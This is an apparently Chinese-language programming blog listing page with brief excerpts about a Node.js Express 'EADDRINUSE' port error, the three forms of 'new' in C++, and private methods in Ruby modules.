  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他